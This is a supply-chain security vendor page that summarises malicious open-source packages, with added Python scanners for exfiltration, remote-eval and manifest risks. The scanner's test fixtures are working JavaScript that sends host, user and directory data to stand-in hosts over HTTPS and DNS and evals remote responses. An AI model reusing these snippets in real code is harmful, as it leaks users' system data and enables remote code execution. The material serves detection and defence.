You're invited: Meet the Socket team at Black Hat and DEF CON in Las Vegas, Aug 4-6.

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.


Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery (timmywil published 3.7.1)
left-pad (stevemao published 1.3.0)
react (react-bot published 19.1.0)

We protect you from vulnerable and malicious packages

shaiduwkv

912.6

Removed from PyPI

Blocked by Socket

The code poses a significant security risk by sending sensitive system information to suspicious external domains. This behavior is consistent with data exfiltration attempts, and the use of unknown URLs suggests potential malicious intent.

Live on PyPI for 3 hours and 30 minutes before removal. Socket users were protected even while the package was live.

abu-news-api

1.0.0

Removed from npm

Blocked by Socket

The code appears to be collecting sensitive system and environment information and is designed to send this data to a remote server. This behavior is indicative of a data exfiltration attempt, which can be considered malicious depending on the context in which this script is used. However, due to incomplete and malformed request execution code, as presented, the script would not successfully send data as intended.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

discord.js-hex

1.0.0

by xignoticdev

Removed from npm

Blocked by Socket

Given the obfuscation, use of critical node modules, and patterns consistent with malicious scripts such as dynamic execution of code, the script is likely intended to perform unauthorized actions on the system. This includes data manipulation, executing commands, or acting as a backdoor.

Live on npm for 1 day and 37 minutes before removal. Socket users were protected even while the package was live.

akita-poc

1.2.5

by pepolanza

Removed from npm

Blocked by Socket

The script sends the hostname of the machine to a remote server, which poses a significant security risk and indicates malicious behavior.

Live on npm for 1 minute before removal. Socket users were protected even while the package was live.

hydroscript

0.0.2-1.real

by hyperknf

Removed from npm

Blocked by Socket

The code potentially allows execution of arbitrary JavaScript code by manipulating the 'time' input to point to a malicious script. The lack of validation or sanitization of the input combined with the execution rights raises security concerns.

Live on npm for 5 days, 21 hours and 40 minutes before removal. Socket users were protected even while the package was live.

glup-debugger-log

0.0.2

by wzh0505

Removed from npm

Blocked by Socket

The code exhibits potentially malicious behavior with dynamic command execution and file operations that could lead to system compromise. Caution is advised when dealing with this code as it poses a high security risk.

Live on npm for 29 minutes before removal. Socket users were protected even while the package was live.

bfx-svc-integration

99.10.10

Removed from npm

Blocked by Socket

The code engages in potentially malicious behavior by collecting sensitive system information and sending it to a remote server without clear user consent. The hard-coded domain, data obfuscation, and lack of transparency raise significant privacy and security concerns. The risk score is high due to the invasive nature of the code.

Live on npm for 18 minutes before removal. Socket users were protected even while the package was live.

minecraft-coins-free975

1.0.2

by sicrap

Removed from npm

Blocked by Socket

The code exhibits potentially malicious behavior such as unauthorized login attempts and content publishing, as well as obfuscation and hard-coded credentials. The overall security risk is high due to the presence of these factors.

Live on npm for 57 minutes before removal. Socket users were protected even while the package was live.

vite-plugin-svg-paths

1.1.7

by sammd

Live on npm

Blocked by Socket

The code contains a severe security vulnerability due to the use of eval() on remotely fetched data, enabling remote code execution. This represents a critical supply chain security risk. The unknown domain contacted and suspicious headers increase suspicion. The code should not be used in production or trusted environments without significant revision. Malware risk is high due to arbitrary code execution potential.

lotus-symphony-dle682

1.0.0

by afifaljafari112

Removed from npm

Blocked by Socket

The code contains unusual naming conventions and method calls that do not align with standard practices. Without the actual content of the imported modules, it's challenging to determine the exact behavior or intent of the code. The naming and structure raise suspicion but do not definitively indicate malicious intent. There is no evidence of data leakage or clear security risks within the provided code itself. However, the lack of clarity and unusual patterns suggest that a more in-depth review of the imported modules is necessary to rule out potential threats.

Live on npm for 57 days and 54 minutes before removal. Socket users were protected even while the package was live.

ac-base

0.26.999

Removed from npm

Blocked by Socket

The code exhibits malicious behavior by collecting and exfiltrating system information using DNS queries. The heavy obfuscation further suggests an intent to hide these actions. This poses a significant security risk.

Live on npm for 59 minutes before removal. Socket users were protected even while the package was live.

relativity123rf

5.98.99

by nevadatan46

Removed from npm

Blocked by Socket

The code is malicious. It collects sensitive system information (hostname, current user, current working directory, and directory listing) without consent, encodes this information in base64 to obfuscate it, and sends it to an external server. This behavior is characteristic of a malware payload designed for data exfiltration.

Live on npm for 26 minutes before removal. Socket users were protected even while the package was live.

pwn

0.5.316

by 0day Inc.

Live on Rubygems

Blocked by Socket

The script 'packer/provisioners/post_install.sh' exhibits malicious behavior by performing several harmful actions:
- **Deletes user and root history files**: Uses secure deletion methods to remove history files, potentially to conceal malicious activities.
- **Clears system log files**: Erases log files from '/var/log', hindering the ability to audit and investigate system actions.
- **Disables the root account**: Locks the root account password without ensuring alternative secure administrative access, possibly preventing legitimate administrative operations.
- **Sets a weak default password ('changeme') for the 'admin' user**: Introduces a significant security risk by using an easily guessable password, facilitating unauthorized access.
These actions can be exploited by an attacker to gain unauthorized access, disrupt legitimate operations, and prevent system recovery. The combination of log and history deletion, disabling of root access, and setting weak credentials indicates malicious intent to compromise system security and conceal nefarious activities.

01node_worm

1.0.0

by coder_jqy

Removed from npm

Blocked by Socket

The code is designed to fetch and process JSONP data from a remote API. It contains a serious security flaw by using eval() on untrusted network data, which can lead to remote code execution vulnerabilities. There is no direct evidence of malware or obfuscation, but the security risk is high due to unsafe eval usage. The reports provided are invalid and uninformative. It is recommended to avoid eval and use safer JSONP parsing or standard JSON parsing methods. Hardcoded cookies and headers should be handled carefully to avoid leaking sensitive information.

Live on npm for 4 hours and 26 minutes before removal. Socket users were protected even while the package was live.

mre-config-react

2.0.8

by higoarm

Removed from npm

Blocked by Socket

The code snippet transmits the local machine's hostname to an external, suspicious ngrok.io domain without user consent, silently ignoring errors and response. This constitutes a privacy violation and potential data exfiltration, which is suspicious and may be malicious depending on context. There is no obfuscation or complex code, but the use of a dynamic external endpoint and silent error handling increases the security risk. Overall, this code should be treated as potentially malicious or at least privacy-invasive.

Live on npm for 1 hour and 38 minutes before removal. Socket users were protected even while the package was live.

imad213

1.1.1

Removed from PyPI

Blocked by Socket

This Python-based credential harvester masquerades as an Instagram growth tool while implementing multiple layers of deception. The malware uses base64 encoding to conceal its code and checks a remote Netlify-hosted file for authorization before executing. Upon running, it prompts users for Instagram credentials under the pretense of providing follower growth services, stores these credentials in plaintext locally, and then broadcasts the username and password to ten different Turkish bot service websites. Each of these third-party services receives full access to the victim's Instagram account, enabling them to read private messages, post content, harvest follower data, or sell the credentials on underground markets. The tool violates Instagram's Terms of Service through automated bot activity while simultaneously compromising account security, potentially resulting in account suspension, identity theft, or complete account takeover.

Live on PyPI for 1 hour and 4 minutes before removal. Socket users were protected even while the package was live.

textvqa

99.10.9

by ujj6dg4z

Removed from npm

Blocked by Socket

The code is designed to collect and send sensitive information to a remote server without the user's knowledge or consent. It poses a high risk of data exfiltration and should be reviewed thoroughly.

Live on npm for 2 hours and 52 minutes before removal. Socket users were protected even while the package was live.

jupphelp

0.1.0

Removed from PyPI

Blocked by Socket

The code poses a significant security risk by downloading and executing a file from an external source without verification. This could lead to arbitrary code execution if the URL is compromised. The use of silent exception handling further obscures potential errors.

Live on PyPI for 5 minutes before removal. Socket users were protected even while the package was live.

@openapi-platform/git-util

9.9.10

by nodeeee123

Live on npm

Blocked by Socket

The source code exhibits highly suspicious and malicious behavior by exfiltrating sensitive system and package information to an untrusted external server without user consent. This represents a serious security risk and privacy violation. The code is not obfuscated but is clearly designed to steal data stealthily. It should be considered malicious and avoided.

@chegg/wtai-upload-widget

9.999.2

by frankoiuuu

Live on npm

Blocked by Socket

The code is designed to exfiltrate system information to an external server, which is a clear security risk and potentially malicious behavior.

posctss-value-parser

4.2.0

by nsrvmzuq

Removed from npm

Blocked by Socket

The code is dangerous and should not be used. The file downloaded from the external source should be verified and validated before being executed, and errors and exceptions should be handled properly.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

airbnb-dev

6.8.0

by jpdtest1

Removed from npm

Blocked by Socket

The code is designed to collect and transmit system information to external endpoints without user consent, which is indicative of malicious behavior. The hardcoded endpoints and the nature of the data being sent pose a significant security risk.

Live on npm for 23 hours and 28 minutes before removal. Socket users were protected even while the package was live.

qumra-ui

0.0.75

by abdalstar

Live on npm

Blocked by Socket

The package contains a hidden payload that targets Russian language users visiting Russian and Belarusian sites. For those users, it will disable user interaction and play a looping audio of the Ukrainian anthem after 3 days. Therefore, it is marked as malware only because it freezes interactions for many users. This behavior is not disclosed in any documentation of the package and seriously disrupts user experience.

bender-event-definition-loader

8.989.1

by hbsp0t

Removed from npm

Blocked by Socket

The source code contains a serious security issue where environment variables are sent to a remote server without user consent. This is a clear indication of data exfiltration and poses a high security risk.

Live on npm for 8 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

13.26.1000

Removed from npm

Blocked by Socket

Possible typosquat of azure (https://socket.dev/npm/package/azure)

Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles 'azure' and could be misleading. The maintainers list includes 'npm', which is not a specific known maintainer. The description does not provide enough information to determine a distinct purpose, and the similarity in naming suggests it could be a typosquat.

azure-graphrbac is a security-holding package.

Live on npm for 3 hours and 1 minute before removal. Socket users were protected even while the package was live.
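
The entries above keep describing the same few behaviours: host, user, working-directory and environment data collected and sent to a hard-coded remote endpoint over HTTP or DNS, often base64- or hex-encoded first, errors silently swallowed, and eval() applied to whatever a remote server returns. The block below is an added example of a coarse heuristic that flags those combinations in JavaScript source. It is not Socket's scanner and not code from any package listed here; the regexes, the sample files and the hosts collector.example, c2.example and api.example are assumptions constructed to mirror the write-ups.

```python
"""Heuristic source scan for the behaviours described in the entries above:
host/user/environment data collected and sent out over HTTP or DNS, often
base64- or hex-encoded first, and eval() applied to data fetched from the
network. Added example, not Socket's scanner; the sample packages below are
constructed to mirror the write-ups, not copied from any real package."""
from __future__ import annotations
import re

# Coarse signal patterns over JavaScript source. The verdicts below come from
# combinations of signals (collect + send, fetch + eval), not from one match.
COLLECT = re.compile(
    r"os\.(hostname|userInfo|networkInterfaces)\(|process\.(env\b|cwd\()|readdirSync\(")
NETWORK = re.compile(r"https?\.(request|get)\(|\bfetch\(|axios\.(get|post)\(|XMLHttpRequest")
DNS = re.compile(r"dns\.(resolve|resolve4|resolveTxt|lookup)\(")
ENCODE = re.compile(r"toString\(['\"](base64|hex)['\"]\)|\bbtoa\(")
EVAL = re.compile(r"\beval\(|new Function\(|vm\.runIn(This|New)Context\(")


def scan_source(src: str) -> list[str]:
    """Return human-readable findings for one JavaScript file."""
    collects, sends, dns, encodes, evals = (
        bool(p.search(src)) for p in (COLLECT, NETWORK, DNS, ENCODE, EVAL))
    findings = []
    if collects and (sends or dns):
        channel = "DNS" if dns and not sends else "HTTP"
        findings.append(f"exfiltration: system/environment data collected and sent over {channel}")
        if encodes:
            findings.append("obfuscated exfiltration: collected data is encoded before it leaves the host")
    if evals and sends:
        findings.append("remote code execution: eval/Function applied in code that fetches remote data")
    return findings


def scan_files(files: dict[str, str]) -> list[str]:
    """Scan every source file of a package; findings are prefixed with the path."""
    findings = []
    for name, src in files.items():
        findings.extend(f"{name}: {f}" for f in scan_source(src))
    return findings


# Constructed samples (not real package code).
EXFIL_JS = """
const os = require("os"), fs = require("fs"), https = require("https");
const info = { h: os.hostname(), u: os.userInfo().username, d: process.cwd(), l: fs.readdirSync(".") };
const body = Buffer.from(JSON.stringify(info)).toString("base64");
const req = https.request({ hostname: "collector.example", method: "POST", path: "/" }, () => {});
req.on("error", () => {});   // silent failure, like several entries above
req.end(body);
"""
DNS_JS = """
const dns = require("dns"), os = require("os");
const label = Buffer.from(os.hostname()).toString("hex");
dns.resolve(label + ".c2.example", () => {});   // the data leaves inside the query name
"""
EVAL_JS = """
const https = require("https");
https.get("https://api.example/jsonp?cb=cb", (res) => {
  let data = "";
  res.on("data", (c) => { data += c; });
  res.on("end", () => eval(data));   // whatever the server returns runs here
});
"""
BENIGN_JS = """
const path = require("path");
module.exports = (p) => path.basename(p);
"""
SAMPLE_FILES = {"index.js": EXFIL_JS, "lib/util.js": BENIGN_JS}

if __name__ == "__main__":
    for line in scan_files(SAMPLE_FILES):
        print(line)
```

Co-occurrence within one file is a deliberately blunt rule: it catches the one-file install payloads described above, and it will also flag a legitimate telemetry module, which is why a tool like this should produce a review prompt rather than a verdict.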

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Known malware

Possible typosquat attack

Chrome Extension Permission

Chrome Extension Wildcard Host Permission

NPM Shrinkwrap

Git dependency

HTTP dependency

Suspicious Stars on GitHub

Protestware or potentially unwanted behavior

Unstable ownership

...and 25 more alerts
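
Several of the alerts listed above can be raised from the package manifest alone, before any source is read. The block below is an added example of such manifest-level checks (possible typosquat, install scripts, git and HTTP dependencies, a published npm-shrinkwrap.json, and the "security holding package" description seen in the azure-graphrbac entry). It is not Socket's implementation; the POPULAR name list, the edit-distance threshold and the sample manifest are assumptions constructed for illustration, and a hit is a prompt to look, not a verdict.

```python
"""Manifest-level checks for several of the alert types listed above:
possible typosquat, install scripts, git and HTTP dependencies, and a
published npm-shrinkwrap.json. Added example, not Socket's implementation.
POPULAR and the sample manifest are constructed for illustration."""
from __future__ import annotations

# Assumed list of well-known names to compare against; a real check would
# derive this from registry download counts.
POPULAR = ["postcss-value-parser", "react", "lodash", "express", "chalk", "axios"]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def possible_typosquat(name: str, popular=POPULAR, max_dist: int = 2):
    """Closest popular name within max_dist edits as (target, distance), or None.
    An exact match is the popular package itself, not a squat."""
    base = name.split("/")[-1]          # compare the unscoped part of @scope/name
    if base in popular:
        return None
    dist, target = min((edit_distance(base, p), p) for p in popular)
    return (target, dist) if dist <= max_dist else None


def dependency_alerts(deps: dict[str, str]) -> list[str]:
    """Git and HTTP specifiers bypass the registry: no immutable version, no
    registry-side scanning, and a moved tag or re-uploaded tarball silently
    changes what gets installed."""
    alerts = []
    for dep, spec in deps.items():
        s = spec.lower()
        if s.startswith(("git+", "git://", "github:", "gitlab:", "bitbucket:")) or s.endswith(".git"):
            alerts.append(f"git dependency: {dep} -> {spec}")
        elif s.startswith(("http://", "https://")):
            alerts.append(f"http dependency: {dep} -> {spec}")
    return alerts


def manifest_alerts(manifest: dict, files: set[str]) -> list[str]:
    """Alerts derivable from package.json plus the list of shipped file names."""
    alerts = []
    name = manifest.get("name", "")
    hit = possible_typosquat(name)
    if hit:
        alerts.append(f"possible typosquat: '{name}' is {hit[1]} edit(s) from '{hit[0]}'")
    if "security holding package" in manifest.get("description", "").lower():
        alerts.append("security holding package: registry placeholder, nothing to depend on")
    scripts = manifest.get("scripts", {})
    for hook in ("preinstall", "install", "postinstall"):   # run on `npm install`
        if hook in scripts:
            alerts.append(f"install script '{hook}' runs on npm install: {scripts[hook]}")
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        alerts.extend(dependency_alerts(manifest.get(section, {})))
    if "npm-shrinkwrap.json" in files:
        alerts.append("npm-shrinkwrap.json is published: it overrides consumers' resolution of this package's dependencies")
    return alerts


# Constructed sample: the name is one of the packages listed above, everything
# else (scripts, dependencies, hosts, file list) is made up.
SAMPLE_MANIFEST = {
    "name": "posctss-value-parser",
    "version": "4.2.0",
    "scripts": {"postinstall": "node setup.js"},
    "dependencies": {
        "left-pad": "^1.3.0",
        "helper": "git+https://github.com/example/helper.git",
        "blob": "https://cdn.example/blob-1.0.0.tgz",
    },
}
SAMPLE_FILES = {"package.json", "index.js", "setup.js", "npm-shrinkwrap.json"}

if __name__ == "__main__":
    for line in manifest_alerts(SAMPLE_MANIFEST, SAMPLE_FILES):
        print(line)
```

The typosquat check compares only the unscoped part of a name, so a scoped package that reuses a popular name is treated as the popular package; dependency-confusion style squats on scoped names need a separate check against the organisation's own scope.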

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.


Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.


Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.


Why teams choose Socket

Pro-active security

Depend on Socket to prevent malicious open source dependencies from infiltrating your app.

Easy to install

Install the Socket GitHub App in just 2 clicks and get protected today.

Comprehensive open source protection

Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Develop faster

Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Dec 14, 2023

Hijacked cryptocurrency library adds malware

Widely-used library in cryptocurrency frontend was compromised to include wallet-draining code, following the hijacking of NPM account credentials via phishing.

Jan 06, 2022

Maintainer intentionally adds malware

Rogue maintainer sabotages his own open source package with 100M downloads/month, notably breaking Amazon's AWS SDK.

Nov 15, 2021

npm discovers a platform vulnerability allowing unauthorized publishing of any package

Attackers could publish new versions of any npm package without authorization for multiple years.

Oct 22, 2021

Hijacked package adds cryptominers and password-stealing malware

Multiple packages with 30M downloads/month are hijacked and publish malicious versions directly into the software supply chain.

Nov 26, 2018

Package hijacked adding organization specific backdoors

Obfuscated malware added to a dependency which targeted a single company, went undetected for over a week, and made it into their production build.
